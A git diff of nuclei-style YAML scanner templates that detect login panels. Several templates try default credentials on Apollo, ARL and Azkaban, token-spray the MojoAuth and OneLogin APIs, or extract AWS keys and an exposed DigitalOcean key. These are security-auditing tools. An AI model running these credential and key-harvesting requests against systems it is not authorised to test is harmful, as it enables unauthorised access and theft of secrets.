digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apc-ups-login-381.yaml b/poc/auth/apc-ups-login-382.yaml similarity index 100% rename from poc/auth/apc-ups-login-381.yaml rename to poc/auth/apc-ups-login-382.yaml diff --git a/poc/auth/apc-ups-login.yaml b/poc/auth/apc-ups-login.yaml deleted file mode 100644 index 46722d9e73..0000000000 --- a/poc/auth/apc-ups-login.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apc-ups-login - -info: - name: APC UPS Login - author: droberson - severity: info - reference: - - https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/api-mojoauth-466.yaml b/poc/auth/api-mojoauth-466.yaml deleted file mode 100644 index 85c9820f23..0000000000 --- a/poc/auth/api-mojoauth-466.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - metadata: - max-request: 1 - tags: token-spray,mojoauth - -self-contained: true - -http: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and - -# digest: 4a0a0047304502200506d39f1578c027a21bc88f89e4c08aeb679ca01db946d0b2bfb56e7d8c615d022100b6123ee1887fe67d62e526c14ad9b4bd755d1727085a16877bbb8b59651f33ba:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/api-mojoauth.yaml b/poc/auth/api-mojoauth.yaml new file mode 100644 index 0000000000..db56c9a9bc --- /dev/null +++ b/poc/auth/api-mojoauth.yaml @@ -0,0 +1,28 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + description: Secure and modern passwordless authentication platform + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/poc/auth/api-onelogin-472.yaml b/poc/auth/api-onelogin-472.yaml deleted file mode 100644 index 1a1de60b69..0000000000 --- a/poc/auth/api-onelogin-472.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-onelogin - -info: - name: OneLogin API Test - author: dwisiswant0 - severity: info - reference: - - https://developers.onelogin.com/api-docs/2/getting-started/dev-overview - metadata: - max-request: 2 - tags: token-spray,onelogin - -self-contained: true - -http: - - method: GET - path: - - "https://api.us.onelogin.com/api/2/apps" - - "https://api.eu.onelogin.com/api/2/apps" - - headers: - Authorization: Bearer {{token}} - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - '"id":' - - '"connector_id":' - - '"auth_method":' - condition: and - -# digest: 4b0a00483046022100c863b1c5238bae97a22123c1fbcc2dffca09b867f1799b647646ae4ecc1fa317022100e9d0e913bb9c5089ceb35ecb0caa5f24a658dbd956febbb59d91a64027c9c728:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/api-onelogin.yaml b/poc/auth/api-onelogin.yaml new file mode 100644 index 0000000000..d8369ad80b --- /dev/null +++ b/poc/auth/api-onelogin.yaml @@ -0,0 +1,27 @@ +id: api-onelogin + +info: + name: OneLogin API Test + author: dwisiswant0 + severity: info + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview + tags: token-spray,onelogin + +self-contained: true +requests: + - method: GET + path: + - "https://api.us.onelogin.com/api/2/apps" + - "https://api.eu.onelogin.com/api/2/apps" + headers: + Authorization: Bearer {{token}} + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - '"id":' + - '"connector_id":' + - '"auth_method":' + condition: and diff --git a/poc/auth/apollo-default-login-520.yaml b/poc/auth/apollo-default-login-520.yaml index c9e119d097..f671e7631e 100644 --- a/poc/auth/apollo-default-login-520.yaml +++ b/poc/auth/apollo-default-login-520.yaml @@ -5,14 +5,14 @@ info: author: PaperPen severity: high description: An Apollo default login was discovered. + metadata: + shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:11794165 tags: apollo,default-login requests: diff --git a/poc/auth/apollo-default-login-521.yaml b/poc/auth/apollo-default-login-521.yaml new file mode 100644 index 0000000000..03709bd616 --- /dev/null +++ b/poc/auth/apollo-default-login-521.yaml @@ -0,0 +1,55 @@ +id: apollo-default-login + +info: + name: Apollo Default Login + author: PaperPen + severity: high + description: An Apollo default login was discovered. + reference: + - https://github.com/apolloconfig/apollo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 + shodan-query: http.favicon.hash:11794165 + tags: apollo,default-login + +http: + - raw: + - | + POST /signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/signin? + + username={{user}}&password={{pass}}&login-submit=Login + - | + GET /user HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + user: + - apollo + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '"userId":' + - '"email":' + condition: or + + - type: dsl + dsl: + - "status_code_1 == 302 && status_code_2 == 200" + - "contains(tolower(header_2), 'application/json')" + condition: and + +# digest: 4a0a004730450220546faaa98906288873457aaf445639368f32ddc0a459ae0362b9c87333a0832d022100a718e9fdccaa633152c35bd8f59d89e60a8a24f359521d6c6b0232fe8a07e196:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apple-app-site-association-524.yaml b/poc/auth/apple-app-site-association-524.yaml new file mode 100644 index 0000000000..9954c8d681 --- /dev/null +++ b/poc/auth/apple-app-site-association-524.yaml @@ -0,0 +1,34 @@ +id: apple-app-site-association + +info: + name: Apple app site association for harvesting end points + author: panch0r3d + severity: info + tags: misc + +requests: + - method: GET + path: + - "{{BaseURL}}/.well-known/apple-app-site-association" + - "{{BaseURL}}/well-known/apple-app-site-association" + - "{{BaseURL}}/apple-app-site-association" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'applinks' + - 'appID' + - 'paths' + part: body + condition: and + + - type: word + words: + - 'application/json' + part: header + + - type: status + status: + - 200 diff --git a/poc/auth/apple-app-site-association-525.yaml b/poc/auth/apple-app-site-association-525.yaml index 53fd428289..5e3aa3c443 100644 --- a/poc/auth/apple-app-site-association-525.yaml +++ b/poc/auth/apple-app-site-association-525.yaml @@ -4,7 +4,6 @@ info: name: Apple app site association for harvesting end points author: panch0r3d severity: info - tags: misc,apple requests: - method: GET @@ -12,23 +11,16 @@ requests: - "{{BaseURL}}/.well-known/apple-app-site-association" - "{{BaseURL}}/well-known/apple-app-site-association" - "{{BaseURL}}/apple-app-site-association" - - stop-at-first-match: true + redirects: true + max-redirects: 2 + headers: + User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" matchers-condition: and matchers: - - type: word + - type: regex + regex: + - '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)' part: body - words: - - 'applinks' - - 'appID' - - 'paths' - condition: and - - - type: word - part: header - words: - - 'application/json' - - type: status status: - 200 diff --git a/poc/auth/argocd-login-536.yaml b/poc/auth/argocd-login-536.yaml index 4bf12b6196..abb3c928e6 100644 --- a/poc/auth/argocd-login-536.yaml +++ b/poc/auth/argocd-login-536.yaml @@ -2,25 +2,42 @@ id: argocd-detect info: name: Argo CD Login Panel - author: Adam Crosser,daffainfo + author: Adam Crosser,daffainfo,aringo severity: info - description: Argo CD is a tool which will read your environment configuration (written either as a helm chart, kustomize files, jsonnet or plain yaml files) from your git repository and apply it to your Kubernetes namespaces. + description: An Argo CD login panel was discovered. + reference: + - https://argoproj.github.io/cd/ + classification: + cwe-id: CWE-200 metadata: + max-request: 2 shodan-query: http.title:"Argo CD" tags: panel,argocd,login,kubernetes -requests: +http: - method: GET path: - - "{{BaseURL}}/login" + - "{{BaseURL}}/api/version" + - "{{BaseURL}}/api/v1/settings" - matchers-condition: and + stop-at-first-match: true + + matchers-condition: or matchers: - - type: word - part: body - words: - - 'Argo CD' + - type: dsl + dsl: + - contains(to_lower(header_1), 'grpc-metadata-content-type') + - status_code_1 == 200 + condition: and + + - type: dsl + dsl: + - contains(body_2, 'appLabelKey') + - contains(body_2, 'resourceOverrides') + condition: and - - type: status - status: - - 200 + extractors: + - type: json + json: + - .Version +# digest: 4a0a00473045022100e4bfd42b83a19cf9d72d03fdb350a06f61f4edd94fd0cb2e322d8763ed28b49402205e8b57d8c9e543ed035d43cfd9854b21b016751f6b1d05adac2118e45199f226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/arl-default-login-537.yaml b/poc/auth/arl-default-login-537.yaml deleted file mode 100644 index bbadfab474..0000000000 --- a/poc/auth/arl-default-login-537.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: arl-default-login - -info: - name: ARL Default Admin Login - author: pikpikcu - description: An ARL default admin login was discovered. - severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: arl,default-login - -requests: - - raw: - - | - POST /api/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - - {"username":"{{username}}","password":"{{password}}"} - - payloads: - username: - - admin - password: - - arlpass - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - condition: and - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-login-540.yaml b/poc/auth/arl-default-login-540.yaml new file mode 100644 index 0000000000..a7c16e40a9 --- /dev/null +++ b/poc/auth/arl-default-login-540.yaml @@ -0,0 +1,37 @@ +id: arl-default-login + +info: + name: ARL Default Login + author: pikpikcu + severity: high + tags: arl,default-login + +requests: + - raw: + - | + POST /api/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + + {"username":"{{username}}","password":"{{password}}"} + + payloads: + username: + - admin + password: + - arlpass + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + condition: and + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + + - type: status + status: + - 200 diff --git a/poc/auth/arl-default-login.yaml b/poc/auth/arl-default-login.yaml index a7c16e40a9..bbadfab474 100644 --- a/poc/auth/arl-default-login.yaml +++ b/poc/auth/arl-default-login.yaml @@ -1,9 +1,14 @@ id: arl-default-login info: - name: ARL Default Login + name: ARL Default Admin Login author: pikpikcu + description: An ARL default admin login was discovered. severity: high + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: arl,default-login requests: @@ -35,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/arl-default-password.yaml b/poc/auth/arl-default-password.yaml index 08f426e7da..d1be4b04a1 100644 --- a/poc/auth/arl-default-password.yaml +++ b/poc/auth/arl-default-password.yaml @@ -1,11 +1,9 @@ id: arl-default-password - info: name: ARL Default Password author: pikpikcu severity: high tags: arl,default-login - requests: - method: POST path: @@ -14,10 +12,8 @@ requests: Content-Type: application/json; charset=UTF-8 body: | {"username":"admin","password":"arlpass"} - matchers-condition: and matchers: - - type: word words: - '"message": "success"' diff --git a/poc/auth/atvise-login-589.yaml b/poc/auth/atvise-login-589.yaml deleted file mode 100644 index 74ba38fb08..0000000000 --- a/poc/auth/atvise-login-589.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: atvise-login - -info: - name: Atvise Login Panel - author: idealphase - severity: info - description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. - reference: - - https://www.exploit-db.com/ghdb/7837 - - https://www.atvise.com/en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - metadata: - google-dork: intitle:"atvise - next generation" - tags: panel,atvise - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'atvise - next generation' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/atvise-login-590.yaml b/poc/auth/atvise-login-590.yaml index ebc1df47af..74ba38fb08 100644 --- a/poc/auth/atvise-login-590.yaml +++ b/poc/auth/atvise-login-590.yaml @@ -1,13 +1,18 @@ id: atvise-login info: - name: Atvise Login panel + name: Atvise Login Panel author: idealphase severity: info - description: atvise is leading visualization and control center solutions based on pure web technology + description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. reference: - https://www.exploit-db.com/ghdb/7837 - https://www.atvise.com/en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 metadata: google-dork: intitle:"atvise - next generation" tags: panel,atvise @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/atvise-login-591.yaml b/poc/auth/atvise-login-591.yaml new file mode 100644 index 0000000000..ebc1df47af --- /dev/null +++ b/poc/auth/atvise-login-591.yaml @@ -0,0 +1,29 @@ +id: atvise-login + +info: + name: Atvise Login panel + author: idealphase + severity: info + description: atvise is leading visualization and control center solutions based on pure web technology + reference: + - https://www.exploit-db.com/ghdb/7837 + - https://www.atvise.com/en + metadata: + google-dork: intitle:"atvise - next generation" + tags: panel,atvise + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'atvise - next generation' + + - type: status + status: + - 200 diff --git a/poc/auth/avatier-password-management-604.yaml b/poc/auth/avatier-password-management-604.yaml new file mode 100644 index 0000000000..62d6395e8a --- /dev/null +++ b/poc/auth/avatier-password-management-604.yaml @@ -0,0 +1,32 @@ +id: avatier-password-management + +info: + name: Avatier Password Management Panel Detect + author: praetorian-thendrickson + severity: info + description: An Avatier password management panel was detected. + reference: + - https://www.avatier.com + metadata: + shodan-query: http.favicon.hash:983734701 + tags: panel,avatier + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + matchers-condition: and + matchers: + - type: word + words: + - 'LabelWelcomeToPS' + - 'Avatier Corporation' + condition: and + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/avatier-password-management-605.yaml b/poc/auth/avatier-password-management-605.yaml deleted file mode 100644 index 49cd4c37ae..0000000000 --- a/poc/auth/avatier-password-management-605.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: avatier-password-management - -info: - name: Avatier Password Management Panel - author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK - severity: info - description: An Avatier password management panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6576 - - https://www.avatier.com/products/identity-management/password-management/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.favicon.hash:983734701 - tags: panel,avatier,aims - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/' - - redirects: true - max-redirects: 2 - matchers-condition: or - matchers: - - type: word - words: - - 'LabelWelcomeToPS' - - 'Avatier Corporation' - - 'Welcome to Password Management' - condition: or - - - type: word - words: - - 'Password Management Client' - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/avatier_password_management.yaml b/poc/auth/avatier_password_management.yaml index f6295f4159..49cd4c37ae 100644 --- a/poc/auth/avatier_password_management.yaml +++ b/poc/auth/avatier_password_management.yaml @@ -1,20 +1,37 @@ ---- id: avatier-password-management info: - name: Avatier Password Management Self Service Portal - author: praetorian-thendrickson + name: Avatier Password Management Panel + author: praetorian-thendrickson,iamthefrogy,dhiyaneshDK severity: info - tags: panel,avatier + description: An Avatier password management panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6576 + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.favicon.hash:983734701 + tags: panel,avatier,aims requests: - method: GET path: - '{{BaseURL}}/aims/ps/' - matchers-condition: and + redirects: true + max-redirects: 2 + matchers-condition: or matchers: - type: word words: - - 'Password Management Client' - - '"LabelWelcomeToPS"' \ No newline at end of file + - 'LabelWelcomeToPS' + - 'Avatier Corporation' + - 'Welcome to Password Management' + condition: or + + - type: word + words: + - 'Password Management Client' + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/avatier_password_management.yml b/poc/auth/avatier_password_management.yml new file mode 100644 index 0000000000..f6295f4159 --- /dev/null +++ b/poc/auth/avatier_password_management.yml @@ -0,0 +1,20 @@ +--- +id: avatier-password-management + +info: + name: Avatier Password Management Self Service Portal + author: praetorian-thendrickson + severity: info + tags: panel,avatier + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Management Client' + - '"LabelWelcomeToPS"' \ No newline at end of file diff --git a/poc/auth/aws-access-key-value-621.yaml b/poc/auth/aws-access-key-value-621.yaml new file mode 100644 index 0000000000..5cb8846e08 --- /dev/null +++ b/poc/auth/aws-access-key-value-621.yaml @@ -0,0 +1,22 @@ +id: aws-access-key-value + +info: + name: AWS Access Key ID Value + author: Swissky + severity: info + metadata: + max-request: 1 + tags: exposure,token,aws,amazon + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" + +# digest: 4a0a004730450220593a92026bc21a26687f6e78f52259873c5643010bf2bf67aec0ad4e469ce40a022100bb56301e5df9b095b39838c76cc5cf37b469e84c9e488be380aa9f1dbfc3df00:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aws-access-key-value-622.yaml b/poc/auth/aws-access-key-value-622.yaml index 5cb8846e08..1448677b12 100644 --- a/poc/auth/aws-access-key-value-622.yaml +++ b/poc/auth/aws-access-key-value-622.yaml @@ -4,19 +4,21 @@ info: name: AWS Access Key ID Value author: Swissky severity: info - metadata: - max-request: 1 - tags: exposure,token,aws,amazon -http: +requests: - method: GET path: - "{{BaseURL}}" - extractors: + matchers-condition: and + matchers: - type: regex part: body regex: - - "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" + - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" -# digest: 4a0a004730450220593a92026bc21a26687f6e78f52259873c5643010bf2bf67aec0ad4e469ce40a022100bb56301e5df9b095b39838c76cc5cf37b469e84c9e488be380aa9f1dbfc3df00:922c64590222798bb761d5b6d8e72950 + extractors: + - type: regex + part: body + regex: + - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/poc/auth/aws-opensearch-login-649.yaml b/poc/auth/aws-opensearch-login-649.yaml deleted file mode 100644 index ffd32b7e76..0000000000 --- a/poc/auth/aws-opensearch-login-649.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aws-opensearch-login - -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws - -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/aws-opensearch-login-650.yaml b/poc/auth/aws-opensearch-login-650.yaml new file mode 100644 index 0000000000..14f111d73a --- /dev/null +++ b/poc/auth/aws-opensearch-login-650.yaml @@ -0,0 +1,25 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/auth/axiom-digitalocean-key-exposure-668.yaml b/poc/auth/axiom-digitalocean-key-exposure-668.yaml new file mode 100644 index 0000000000..2f41c1bfe2 --- /dev/null +++ b/poc/auth/axiom-digitalocean-key-exposure-668.yaml @@ -0,0 +1,43 @@ +id: axiom-digitalocean-key-exposure + +info: + name: DigitalOcean Key Exposure via Axiom + author: geeknik + severity: critical + description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments. + remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom + reference: + - https://github.com/pry0cc/axiom + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-425 + metadata: + max-request: 1 + tags: axiom,digitalocean,key,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/.axiom/accounts/do.json" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"do_key"' + - '"region"' + - '"provider"' + condition: and + + extractors: + - type: regex + part: body + regex: + - '\"do_key\"\: .*' + +# digest: 4a0a00473045022100a9e645db4ccad4bb4a2c55f77872fdef290db609004656d1d6a80c3c8681177e0220328845b85d9651ac0671ab1698e5c1b458c00f1b198e6b727ac209b93ef64c0c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/axiom-digitalocean-key-exposure.yaml b/poc/auth/axiom-digitalocean-key-exposure.yaml deleted file mode 100644 index 85a6008f52..0000000000 --- a/poc/auth/axiom-digitalocean-key-exposure.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: axiom-digitalocean-key-exposure - -info: - name: DigitalOcean Key Exposure via Axiom - author: geeknik - severity: critical - description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments. - remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom - reference: https://github.com/pry0cc/axiom - tags: axiom,digitalocean,key,exposure - classification: - cvss-score: 9.8 - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cwe-id: CWE-425 - -requests: - - method: GET - path: - - "{{BaseURL}}/.axiom/accounts/do.json" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"do_key"' - - '"region"' - - '"provider"' - condition: and - - extractors: - - type: regex - part: body - regex: - - '\"do_key\"\: .*' - -# Enhanced by cs on 2022/02/28 diff --git a/poc/auth/azkaban-default-login-674.yaml b/poc/auth/azkaban-default-login-674.yaml new file mode 100644 index 0000000000..be127dd034 --- /dev/null +++ b/poc/auth/azkaban-default-login-674.yaml @@ -0,0 +1,53 @@ +id: azkaban-default-login + +info: + name: Azkaban Web Client Default Credential + author: pussycat0x + severity: high + description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. + classification: + cwe-id: CWE-798 + metadata: + shodan-query: http.title:"Azkaban Web Client" + tags: default-login,azkaban + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"session.id"' + - '"success"' + condition: and + + - type: word + words: + - 'azkaban.browser.session.id' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - azkaban.browser.session.id + +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/azkaban-default-login-671.yaml b/poc/auth/azkaban-default-login.yaml similarity index 100% rename from poc/auth/azkaban-default-login-671.yaml rename to poc/auth/azkaban-default-login.yaml diff --git a/poc/auth/basic-auth-detection-688.yaml b/poc/auth/basic-auth-detection-688.yaml index e784861b13..b1d95275fc 100644 --- a/poc/auth/basic-auth-detection-688.yaml +++ b/poc/auth/basic-auth-detection-688.yaml @@ -2,8 +2,10 @@ id: basic-auth-detection info: name: Basic auth detection - author: "@w4cky_" + author: esetal severity: info + tags: tech,basic-auth + description: improved version of nuclei-templates/technologies/basic-auth-detection.yaml requests: - method: GET @@ -15,8 +17,6 @@ requests: - type: status status: - 401 - - - type: word - words: - - "Www-Authenticate:" - part: header + - type: dsl + dsl: + - contains(tolower(all_headers), 'www-authenticate') diff --git a/poc/auth/bazarr-login-702.yaml b/poc/auth/bazarr-login-702.yaml deleted file mode 100644 index 2b2e898677..0000000000 --- a/poc/auth/bazarr-login-702.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: bazarr-login-detect - -info: - name: Bazarr Login Detect - author: r3dg33k - severity: info - reference: - - https://www.bazarr.media/ - tags: panel,bazarr,login - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers: - - type: word - words: - - 'Bazarr' \ No newline at end of file diff --git a/poc/auth/beyondtrust-login-server-719.yaml b/poc/auth/beyondtrust-login-server-718.yaml similarity index 100% rename from poc/auth/beyondtrust-login-server-719.yaml rename to poc/auth/beyondtrust-login-server-718.yaml diff --git a/poc/auth/bigbluebutton-login.yaml b/poc/auth/bigbluebutton-login.yaml index 5c06b01d1d..f39653d539 100644 --- a/poc/auth/bigbluebutton-login.yaml +++ b/poc/auth/bigbluebutton-login.yaml @@ -9,9 +9,11 @@ info: - https://github.com/bigbluebutton/greenlight classification: cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,bigbluebutton -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -31,4 +33,4 @@ requests: regex: - 'Greenlight<\/a>\. (.*)' -# Enhanced by mp on 2022/03/23 +# digest: 4a0a0047304502210099961d3076d0221b509af7cb12b6bc28e154ee0fe64c70453333725a8d9dd40402205db99afee860ce6e3fda9ec6008e4b66269491e2499266357880e30a895d52a8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/blue-iris-login-751.yaml b/poc/auth/blue-iris-login-751.yaml new file mode 100644 index 0000000000..4a1e4acd08 --- /dev/null +++ b/poc/auth/blue-iris-login-751.yaml @@ -0,0 +1,31 @@ +id: blue-iris-login + +info: + name: Blue Iris Login + author: dhiyaneshDK + severity: info + description: A Blue Iris login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6814 + - https://blueirissoftware.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,blue-iris + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Blue Iris Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/blue-iris-login-754.yaml b/poc/auth/blue-iris-login-754.yaml deleted file mode 100644 index 224b1d1b46..0000000000 --- a/poc/auth/blue-iris-login-754.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: blue-iris-login - -info: - name: Blue Iris Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6814 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Blue Iris Login' - - type: status - status: - - 200 diff --git a/poc/auth/blue-iris-login.yaml b/poc/auth/blue-iris-login.yaml index 4a1e4acd08..154d0ba968 100644 --- a/poc/auth/blue-iris-login.yaml +++ b/poc/auth/blue-iris-login.yaml @@ -1,20 +1,23 @@ id: blue-iris-login info: - name: Blue Iris Login - author: dhiyaneshDK + name: Blue Iris Login Panel - Detect + author: dhiyaneshDK,idealphase severity: info - description: A Blue Iris login panel was detected. + description: Blue Iris login panel was detected. reference: - https://www.exploit-db.com/ghdb/6814 - https://blueirissoftware.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,blue-iris + metadata: + max-request: 1 + shodan-query: http.title:"Blue Iris Login" + tags: panel,blueiris,edb -requests: +http: - method: GET path: - '{{BaseURL}}/login.htm' @@ -24,8 +27,15 @@ requests: - type: word words: - 'Blue Iris Login' + - type: status status: - 200 -# Enhanced by mp on 2022/03/23 + extractors: + - type: regex + group: 1 + regex: + - 'var bi_version = "(.*)";' + +# digest: 